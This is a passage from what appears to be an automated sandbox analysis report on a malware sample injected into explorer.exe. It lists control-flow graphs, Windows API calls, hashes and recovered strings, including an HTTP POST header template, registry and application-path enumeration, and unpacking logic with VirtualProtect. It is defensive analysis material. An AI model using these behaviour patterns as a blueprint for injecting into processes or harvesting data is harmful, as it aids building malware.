                                                                                  • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                  • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                  • API String ID: 4204651544-1701262698
                                                                                  • Opcode ID: 84aebba9a4810f9ccb3cc3198ca6325e084e536896d94c14b4065c5de2871e67
                                                                                  • Instruction ID: a9748db94052b420092aa3dfa14325dfb4e5a968772d1659fefbb8af6ef99d81
                                                                                  • Opcode Fuzzy Hash: 84aebba9a4810f9ccb3cc3198ca6325e084e536896d94c14b4065c5de2871e67
                                                                                  • Instruction Fuzzy Hash: B0A16E71608350AFD310DF64EC84A2BBBE9EBE8344F14092DF989D3252DB74DD948B96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 528 12a21c-12a232 529 12a2b0-12a2b8 528->529 530 12a234-12a238 528->530 531 12a2bc-12a2d6 529->531 532 12a23a-12a23d 530->532 533 12a23f-12a24f 530->533 536 12a2da-12a2f1 ReadFile 531->536 532->529 532->533 534 12a251 533->534 535 12a277-12a2ae memcpy 533->535 537 12a253-12a256 534->537 538 12a258-12a268 memcpy 534->538 535->531 539 12a332-12a346 call 12a0b8 536->539 540 12a2f3-12a2fc 536->540 537->535 537->538 541 12a26b 538->541 539->541 546 12a34c-12a361 memset 539->546 540->539 547 12a2fe-12a30d call 12a05e 540->547 543 12a26d-12a274 541->543 546->543 547->536 550 12a30f-12a32d call 129fd4 547->550 550->543
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$FileReadmemset
                                                                                  • String ID: winRead
                                                                                  • API String ID: 2051157613-2759563040
                                                                                  • Opcode ID: 1ef23c83631191be787a49890cae70e9721b9066fa0afaf94c7e66c8e8ff352a
                                                                                  • Instruction ID: 6cf77b7bda407502f2451882e1a68ba8fc895be9816a7e341d27ee3f4cb986a2
                                                                                  • Opcode Fuzzy Hash: 1ef23c83631191be787a49890cae70e9721b9066fa0afaf94c7e66c8e8ff352a
                                                                                  • Instruction Fuzzy Hash: D5317632209254ABD744DE58ED819AFBBAAFFC8740F845928F88587210E771ED158B93
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 553 122fa0-122fc5 StrStrIW 554 122fc7-122fdc call 121bad 553->554 555 12302e-12305c call 121000 RegOpenKeyExW 553->555 562 122fde-122fe9 call 121d8d 554->562 563 12302c 554->563 560 1230d8-1230e4 call 121011 555->560 561 12305e-12306d 555->561 565 1230c0-1230cc RegEnumKeyExW 561->565 571 123025-123027 call 121011 562->571 572 122feb-122ff5 call 121cc6 562->572 563->555 568 1230ce-1230d2 RegCloseKey 565->568 569 12306f-123096 call 121b1b call 121b65 call 122fa0 565->569 568->560 586 12309b-1230bf call 121011 569->586 571->563 579 122ff7-123007 call 121b65 572->579 580 12301e-123020 call 121011 572->580 579->580 587 123009-12300f 579->587 580->571 586->565 587->580 589 123010 call 122de7 587->589 589->580
                                                                                  APIs
                                                                                  • StrStrIW.SHLWAPI(?,?), ref: 00122FBB
                                                                                  • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 00123054
                                                                                  • RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 001230C4
                                                                                  • RegCloseKey.KERNEL32(?), ref: 001230D2
                                                                                    • Part of subcall function 00121BAD: RegOpenKeyExW.ADVAPI32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121CAA,PortNumber,00000000,00000000), ref: 00121BE6
                                                                                    • Part of subcall function 00121BAD: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00121C04
                                                                                    • Part of subcall function 00121BAD: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00121C3D
                                                                                    • Part of subcall function 00121BAD: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121CAA,PortNumber,00000000,00000000), ref: 00121C60
                                                                                    • Part of subcall function 00121D8D: lstrlenW.KERNEL32(00000000,00000000,?,00122FE5,PathToExe,00000000,00000000), ref: 00121D94
                                                                                    • Part of subcall function 00121D8D: StrStrIW.SHLWAPI(00000000,.exe), ref: 00121DB8
                                                                                    • Part of subcall function 00121D8D: StrRChrIW.SHLWAPI(00000000,00000000,0000005C), ref: 00121DCD
                                                                                    • Part of subcall function 00121D8D: lstrlenW.KERNEL32(00000000,?,00122FE5,PathToExe,00000000,00000000), ref: 00121DE4
                                                                                    • Part of subcall function 00121CC6: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 00121CDE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                                                  • String ID: PathToExe
                                                                                  • API String ID: 1799103994-1982016430
                                                                                  • Opcode ID: 2da236199b1db216523fed6ff3ba4989246fa3d0cf30be3cad3ab5a07f167386
                                                                                  • Instruction ID: b6c7afd4fb0ef767910e7f3f768eddc05f192dd6dd0a3c9a99c22b0429a5bbce
                                                                                  • Opcode Fuzzy Hash: 2da236199b1db216523fed6ff3ba4989246fa3d0cf30be3cad3ab5a07f167386
                                                                                  • Instruction Fuzzy Hash: 46319D71600221AF8725EF21AC09C6FBABAEFE4750F00451CF86987241EB35CE65DBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 591 12487f-1248dd call 121000 wsprintfW RegCreateKeyExW 594 1248f4-124903 call 121011 591->594 595 1248df-1248eb RegCloseKey 591->595 595->594 596 1248ed-1248f1 595->596 596->594
                                                                                  APIs
                                                                                    • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,00121215,?,?,00000001,00000000,?), ref: 00121003
                                                                                    • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                  • wsprintfW.USER32 ref: 001248B0
                                                                                  • RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 001248D5
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 001248E2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                                                  • String ID: %s\%08x$Software
                                                                                  • API String ID: 1800864259-1658101971
                                                                                  • Opcode ID: ce3f48511fa69b769d2d26e65800d419cf34e2907db71f8b112b3977af5676de
                                                                                  • Instruction ID: 37b57558af153dd20ae5aebc3f463462297b7e954ec7e3be9543791230b8d7e2
                                                                                  • Opcode Fuzzy Hash: ce3f48511fa69b769d2d26e65800d419cf34e2907db71f8b112b3977af5676de
                                                                                  • Instruction Fuzzy Hash: CC012171610118BFEB189FA4EC8ADBF77BCEB54700F40016EFA09A3140EBB16E949671
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • _alloca_probe.NTDLL ref: 0012412A
                                                                                  • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00124143
                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00124171
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 001241D6
                                                                                    • Part of subcall function 00121B1B: lstrlenW.KERNEL32(?,00000000,00000000,?,?,0012307C), ref: 00121B3B
                                                                                    • Part of subcall function 00121B1B: lstrlenW.KERNEL32(00176574,?,?,0012307C), ref: 00121B40
                                                                                    • Part of subcall function 00121B1B: lstrcatW.KERNEL32(00000000,?), ref: 00121B58
                                                                                    • Part of subcall function 00121B1B: lstrcatW.KERNEL32(00000000,00176574), ref: 00121B5C
                                                                                    • Part of subcall function 00123F98: wsprintfW.USER32 ref: 00124020
                                                                                    • Part of subcall function 00121011: GetProcessHeap.KERNEL32(00000000,00000000,?,00121C5A,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121CAA), ref: 00121020
                                                                                    • Part of subcall function 00121011: HeapFree.KERNEL32(00000000), ref: 00121027
                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 001241C7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 801677237-0
                                                                                  • Opcode ID: 5ee8a075f28287557d8cf11a55c64ccf74679ec3d507701119e1d283f676fe51
                                                                                  • Instruction ID: ce671eae1eae546a0558de4f521130f53d6b2407fdb94672c60898fdbdc21c19
                                                                                  • Opcode Fuzzy Hash: 5ee8a075f28287557d8cf11a55c64ccf74679ec3d507701119e1d283f676fe51
                                                                                  • Instruction Fuzzy Hash: 4D1154B1204211BFE715DB10DC45DBB77FDEB98344F00452DF989D2150EB74ADA88A72
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 614 12b689-12b698 615 12b69b-12b6f1 memset 614->615 616 12b6f3-12b701 call 12b459 615->616 617 12b711 615->617 622 12b901-12b907 616->622 623 12b707-12b70f 616->623 619 12b713-12b722 call 12b417 617->619 625 12b8f1 619->625 626 12b728-12b731 call 12b636 619->626 623->619 627 12b8f6-12b8ff call 1266fa 625->627 632 12b737-12b74f 626->632 633 12b8e4-12b8ef call 1266fa 626->633 627->622 634 12b751-12b752 632->634 635 12b754-12b75b 632->635 633->627 637 12b75e-12b770 634->637 635->637 639 12b773-12b78a CreateFileW 637->639 640 12b7d9-12b7f2 call 12a0b8 639->640 641 12b78c-12b791 639->641 648 12b7f4-12b80b call 1266fa * 2 640->648 649 12b84f-12b854 640->649 642 12b793-12b7b8 call 126422 call 12b9ad call 12642e 641->642 643 12b7c4-12b7d7 call 12a05e 641->643 668 12b7c0 642->668 669 12b7ba-12b7be 642->669 643->639 643->640 666 12b822-12b84a call 129fd4 call 174bc0 648->666 667 12b80d-12b812 648->667 654 12b862-12b87c call 1266fa * 2 649->654 655 12b856-12b860 649->655 670 12b882 654->670 671 12b87e-12b880 654->671 655->654 666->622 667->666 672 12b814-12b81d 667->672 668->643 669->640 669->668 674 12b887-12b898 670->674 671->674 672->615 676 12b89a 674->676 677 12b89e-12b8b0 call 1750bc 674->677 676->677 682 12b8b2 677->682 683 12b8b6-12b8e2 677->683 682->683 683->622
                                                                                  APIs
                                                                                  • memset.NTDLL ref: 0012B6E3
                                                                                  • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 0012B77D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFilememset
                                                                                  • String ID: psow$winOpen
                                                                                  • API String ID: 2416746761-4101858489
                                                                                  • Opcode ID: 7aab4c82649674225ce400996f378c336f495b48862bbd31f996f9bd1c6ff41c
                                                                                  • Instruction ID: f0ae4c38a92bd574c3a507aaff422158c6f0ab0874f88d3575e62cc46d93d738
                                                                                  • Opcode Fuzzy Hash: 7aab4c82649674225ce400996f378c336f495b48862bbd31f996f9bd1c6ff41c
                                                                                  • Instruction Fuzzy Hash: 6471C271A08722AFC710DF24E8C171AB7E4FF98724F004A2DF89997291D374D964CB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 684 1891c9-189217 685 189219-18922a 684->685 686 18922b-189253 684->686 685->686 689 18929f-1892a8 686->689 690 189255-189295 686->690 694 1892ba-1892bf 689->694 691 18929b-18929c 690->691 692 18947d 690->692 691->689 692->692 695 1892c1 694->695 696 1892b0-1892b5 695->696 697 1892c3 695->697 698 1892b6-1892b8 696->698 699 1892c8-1892ca 697->699 698->694 698->695 700 1892cc-1892d1 699->700 701 1892d3-1892d7 699->701 700->701 702 1892d9 701->702 703 1892e4-1892e7 701->703 704 1892db-1892e2 702->704 705 189303-189308 702->705 706 1892e9-1892ee 703->706 707 1892f0-1892f2 703->707 704->703 704->705 708 18930a-189313 705->708 709 18931b-18931d 705->709 706->707 707->699 710 18938a-18938d 708->710 711 189315-189319 708->711 712 18931f-189324 709->712 713 189326 709->713 714 189392-189395 710->714 711->713 712->713 715 189328-18932b 713->715 716 1892f4-1892f6 713->716 721 189397-189399 714->721 717 18932d-189332 715->717 718 189334 715->718 719 1892f8-1892fd 716->719 720 1892ff-189301 716->720 717->718 718->716 723 189336-189338 718->723 719->720 724 189355-189364 720->724 721->714 722 18939b-18939e 721->722 722->714 725 1893a0-1893bc 722->725 726 18933a-18933f 723->726 727 189341-189345 723->727 728 189374-189381 724->728 729 189366-18936d 724->729 725->721 730 1893be 725->730 726->727 727->723 731 189347 727->731 728->728 733 189383-189385 728->733 729->729 732 18936f 729->732 734 1893c4-1893c8 730->734 735 189349-189350 731->735 736 189352 731->736 732->698 733->698 737 1893ca-1893e0 LoadLibraryA 734->737 738 18940f-189412 734->738 735->723 735->736 736->724 739 1893e1-1893e6 737->739 740 189415-18941c 738->740 739->734 741 1893e8-1893ea 739->741 742 18941e-189420 740->742 743 189440-189470 VirtualProtect * 2 740->743 745 1893ec-1893f2 741->745 746 1893f3-189400 GetProcAddress 741->746 747 189422-189431 742->747 748 189433-18943e 742->748 744 189474-189478 743->744 744->744 749 18947a 744->749 745->746 750 189409-18940c 746->750 751 189402-189407 746->751 747->740 748->747 749->692 751->739
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1049202487.0000000000187000.00000040.80000000.00040000.00000000.sdmp, Offset: 00187000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_187000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1ac536b43c702f5d6c9bd01e978704774cae55f4851ddee2a8e9736719385f92
                                                                                  • Instruction ID: dfe1e72562ba694334f1832e138c4a3b30044d39b467ac444f27fc1db8143845
                                                                                  • Opcode Fuzzy Hash: 1ac536b43c702f5d6c9bd01e978704774cae55f4851ddee2a8e9736719385f92
                                                                                  • Instruction Fuzzy Hash: A8915C715557925BD721AEB88CC03B57BA1FF52320B2C0778D9E1CB3C6E7645A0ACB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 752 122031-12204d RegOpenKeyW 753 122053-122084 call 121000 RegEnumKeyExW 752->753 754 122110-122114 752->754 757 122086 753->757 758 1220fd-12210f call 121011 RegCloseKey 753->758 760 122087-1220a2 call 121b1b call 121b65 757->760 758->754 766 1220a4-1220b7 760->766 767 1220d8-1220fa RegEnumKeyExW 760->767 770 1220d1-1220d3 call 121011 766->770 771 1220b9-1220cc call 122031 766->771 767->760 768 1220fc 767->768 768->758 770->767 771->770
                                                                                  APIs
                                                                                  • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00122045
                                                                                    • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,00121215,?,?,00000001,00000000,?), ref: 00121003
                                                                                    • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                  • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0012207C
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00122108
                                                                                    • Part of subcall function 00121B1B: lstrlenW.KERNEL32(?,00000000,00000000,?,?,0012307C), ref: 00121B3B
                                                                                    • Part of subcall function 00121B1B: lstrlenW.KERNEL32(00176574,?,?,0012307C), ref: 00121B40
                                                                                    • Part of subcall function 00121B1B: lstrcatW.KERNEL32(00000000,?), ref: 00121B58
                                                                                    • Part of subcall function 00121B1B: lstrcatW.KERNEL32(00000000,00176574), ref: 00121B5C
                                                                                  • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001220F2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1077800024-0
                                                                                  • Opcode ID: 40052b7722df3c4de92df9fb45a4449668735f530d77002f80fd1b45e49cd9fb
                                                                                  • Instruction ID: 67e7ef2cb41587723d23a644d7d9902e1cdb58aee21a881e671d403a60b747b3
                                                                                  • Opcode Fuzzy Hash: 40052b7722df3c4de92df9fb45a4449668735f530d77002f80fd1b45e49cd9fb
                                                                                  • Instruction Fuzzy Hash: CF218C71208211BFD7159B21EC49D2FBAFDEF98344F00492DF88992111DB35CC658B26
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00121E0E
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00123DB6), ref: 00121E1E
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00121E59
                                                                                    • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,00121215,?,?,00000001,00000000,?), ref: 00121003
                                                                                    • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00121E3E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                  • String ID:
                                                                                  • API String ID: 2517252058-0
                                                                                  • Opcode ID: 612a33cec29600845fe1a78b0c154594bf9726b63f687622ba46151ca3b3e140
                                                                                  • Instruction ID: c0c47bbccd8b5dc68e4abd8d6180aba4debdc3247acfc4b946f507e4277b2254
                                                                                  • Opcode Fuzzy Hash: 612a33cec29600845fe1a78b0c154594bf9726b63f687622ba46151ca3b3e140
                                                                                  • Instruction Fuzzy Hash: 17F028322002287FD2219B26FC8CE3B7A6CDB57BF5B120318F919920D0EB226C954171
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00121011: GetProcessHeap.KERNEL32(00000000,00000000,?,00121C5A,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121CAA), ref: 00121020
                                                                                    • Part of subcall function 00121011: HeapFree.KERNEL32(00000000), ref: 00121027
                                                                                    • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,00121215,?,?,00000001,00000000,?), ref: 00121003
                                                                                    • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                  • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 00123054
                                                                                  • RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 001230C4
                                                                                  • RegCloseKey.KERNEL32(?), ref: 001230D2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1066184869-0
                                                                                  • Opcode ID: f293b255ed9d241191623958d3efb1ec1342b602678a6c299af441275d948dd0
                                                                                  • Instruction ID: fcfa0b464dd53439fb8aa63672999f54ceb4a5f313eee2825a2eacdaf50efe94
                                                                                  • Opcode Fuzzy Hash: f293b255ed9d241191623958d3efb1ec1342b602678a6c299af441275d948dd0
                                                                                  • Instruction Fuzzy Hash: 66016D31204260BBC725AF21EC09DAFBBA9EFE4750F004429F85982151DB3989A5EBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExitInitializeProcessUninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 4175140541-0
                                                                                  • Opcode ID: c5429058a99c54c6097574104c33ea86bfd0a85618e39d814a191ef1ae91c6b1
                                                                                  • Instruction ID: 76f1fffa08139ff21948ddca36fa583b9fab96396f95754e3a68571038e76c03
                                                                                  • Opcode Fuzzy Hash: c5429058a99c54c6097574104c33ea86bfd0a85618e39d814a191ef1ae91c6b1
                                                                                  • Instruction Fuzzy Hash: FAC04834284A128FEE902BB1AC0EB1A3A30BB58B0BF001004F60E888A2DB6140D08A22
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 00129E06
                                                                                  Strings
                                                                                  • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 00129E1C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHeap
                                                                                  • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                                  • API String ID: 10892065-982776804
                                                                                  • Opcode ID: 05047e2315041e5640ddcf99fd72f62632c2b7c44d9017f5f1d83e982220db2f
                                                                                  • Instruction ID: b68d961c8fcc8a81a7182072dcefec6b5fef79e9d5a20d20007d548529a51322
                                                                                  • Opcode Fuzzy Hash: 05047e2315041e5640ddcf99fd72f62632c2b7c44d9017f5f1d83e982220db2f
                                                                                  • Instruction Fuzzy Hash: D6F02473608361BAE3309B98FC45F3777ACDBA4785F260829F98697280E370AC518364
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,00121215,?,?,00000001,00000000,?), ref: 00121003
                                                                                    • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                  • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 00121CDE
                                                                                    • Part of subcall function 00121011: GetProcessHeap.KERNEL32(00000000,00000000,?,00121C5A,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121CAA), ref: 00121020
                                                                                    • Part of subcall function 00121011: HeapFree.KERNEL32(00000000), ref: 00121027
                                                                                    • Part of subcall function 00121BAD: RegOpenKeyExW.ADVAPI32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121CAA,PortNumber,00000000,00000000), ref: 00121BE6
                                                                                    • Part of subcall function 00121BAD: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00121C04
                                                                                    • Part of subcall function 00121BAD: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00121C3D
                                                                                    • Part of subcall function 00121BAD: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121CAA,PortNumber,00000000,00000000), ref: 00121C60
                                                                                  Strings
                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00121D08
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                  • API String ID: 2162223993-2036018995
                                                                                  • Opcode ID: d8409f79f846326bade8b79cef3c04c99444df7026181356ca1c0cd4e0f7cab4
                                                                                  • Instruction ID: 34fb4007b6fe61365b2c7fb60250eb65c0f62f86b1ce689dcb5bcceb8a3052d8
                                                                                  • Opcode Fuzzy Hash: d8409f79f846326bade8b79cef3c04c99444df7026181356ca1c0cd4e0f7cab4
                                                                                  • Instruction Fuzzy Hash: D2F0E92770066C77C621A539EC84DB776AECBF13E63160029F52A87206DF13AC911274
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(02DB0000,00000000,?), ref: 00129CC3
                                                                                  Strings
                                                                                  • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 00129CDB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                                                  • API String ID: 1279760036-667713680
                                                                                  • Opcode ID: 15ddbf0de916a69dfcd4947816e8a0c1c33a85d45c68b5119c1b78b701ff50eb
                                                                                  • Instruction ID: 4eb6424f044d6dac130540f86435028e8b64a604c0dcb635f3017fa6cd0eba26
                                                                                  • Opcode Fuzzy Hash: 15ddbf0de916a69dfcd4947816e8a0c1c33a85d45c68b5119c1b78b701ff50eb
                                                                                  • Instruction Fuzzy Hash: 2EE0C2336082207BC21227D8AC05F6FB769EBA5F10F014015FA45A76A0C7309C6287A2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00121D4A
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00121D57
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateFileHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3498533004-0
                                                                                  • Opcode ID: 94dd04efceaecc7b431c8201fe999c01522d36cc2d5ed7aa122bbd2bca57572c
                                                                                  • Instruction ID: 2139fb11574e3762296882885811addcb03159a97fe5e86c1b3f141f65dae7b4
                                                                                  • Opcode Fuzzy Hash: 94dd04efceaecc7b431c8201fe999c01522d36cc2d5ed7aa122bbd2bca57572c
                                                                                  • Instruction Fuzzy Hash: D7D01731643A30B6D975A7B57C0CE976E2CDF43AB5B040A14F51DD14E0C3248CD682E0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • HeapFree.KERNEL32(02DB0000,00000000,?), ref: 00129D06
                                                                                  Strings
                                                                                  • failed to HeapFree block %p (%lu), heap=%p, xrefs: 00129D1C
                                                                                  Memory Dump Source
